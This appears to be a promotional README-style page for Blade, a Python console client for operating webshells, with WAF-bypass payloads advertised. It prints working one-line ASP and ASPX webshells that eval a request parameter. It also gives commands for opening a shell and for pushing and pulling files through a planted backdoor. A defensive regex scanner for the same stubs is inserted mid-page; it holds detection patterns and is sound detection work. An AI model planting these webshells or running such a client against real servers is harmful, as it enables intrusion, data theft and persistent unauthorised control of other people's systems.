Blade: A webshell connection tool with customized WAF bypass payloads

Blade is a console-based webshell connection tool, currently under development, that aims to be a replacement for Chooper. Chooper is a very cool webshell client that supports a wide range of server-side scripts, but it only works on Windows; that is the motivation for creating another “Chooper” that supports Windows, Linux & Mac OS X. Blade is written in Python, so users can modify the webshell connection payloads, which lets Blade bypass some specific WAFs that Chooper cannot.

Major functions

Manage a web server with only a one-line script on it, just like:

  • PHP, ASP, ASPX & JSP supported.
  • Terminal Console provided.
  • File management & Database management.

Features

  • Cross-platform supported (Python needed)
  • Customizable WAF bypass payloads
  • Compatible with Chooper’s server-side scripts

Server side scripts examples

PHP:

ASP: <%eval request("cmd")%>

ASPX: <%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
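On the defending side, one-line scripts like these are easy to hunt for in a web root because they pass a request parameter straight into eval. The scanner below is an added example, not part of Blade or the original page; the regexes, function names and sample files are constructed for illustration, and the PHP pattern is an assumption about the usual equivalent form.

```python
import re
from pathlib import Path

# Request input passed straight to eval, keyed by file suffix. The ASP and ASPX
# patterns follow the one-liners shown above; the PHP pattern is an assumption
# about the usual equivalent form.
PATTERNS = {
    ".asp": re.compile(r"\b(?:eval|execute)\s*\(?\s*request\s*\(", re.I),
    ".aspx": re.compile(r"\beval\s*\(\s*Request(?:\.\w+)?\s*\[", re.I),
    ".php": re.compile(r"\beval\s*\(\s*\$_(?:REQUEST|POST|GET|COOKIE)\b", re.I),
}

# Constructed sample files (not from a real server): two stubs, two benign pages.
SAMPLES = {
    "upload/a.asp": '<%eval request("cmd")%>',
    "upload/b.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>',
    "site/index.php": '<?php echo htmlspecialchars($_GET["q"]); ?>',
    "site/default.aspx": '<%@ Page Language="C#" %><asp:Label runat="server" />',
}

def scan_text(suffix, text):
    """Return (line_number, stripped_line) for every line matching the suffix's pattern."""
    pattern = PATTERNS.get(suffix.lower())
    if pattern is None:
        return []
    return [(n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if pattern.search(line)]

def scan_tree(root):
    """Walk a web root and map each suspicious file path to its matching lines."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in PATTERNS:
            hits = scan_text(path.suffix, path.read_text(errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings

def demo():
    """Scan the constructed samples and return the hits per file name."""
    return {name: scan_text(Path(name).suffix, body) for name, body in SAMPLES.items()}

if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, "SUSPICIOUS" if hits else "clean", hits)
```

A hit is a lead for review rather than proof, and obfuscated variants will not match these patterns, so pair the scan with file-integrity monitoring on the web root.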

Usage

Get a shell:

python blade.py -u http://localhost/shell.php -s php -p cmd --shell

Get a shell with a longer timeout (e.g. for Windows):

python blade.py -u http://localhost/shell.aspx -s asp -p cmd --shell -t 60

Download a file:

python blade.py -u http://localhost/shell.php -s php -p cmd --pull remote_path local_path

Upload a file:

python blade.py -u http://localhost/shell.php -s php -p cmd --push local_path remote_path

Current issues

  • Server-side script support is not complete; currently PHP, ASP and ASPX are supported
  • ASPX file upload/download is still under development
  • The database management function is not complete, so Blade cannot connect to databases

Download

git clone https://github.com/wonderqs/Blade.git

Source: https://github.com/wonderqs/Blade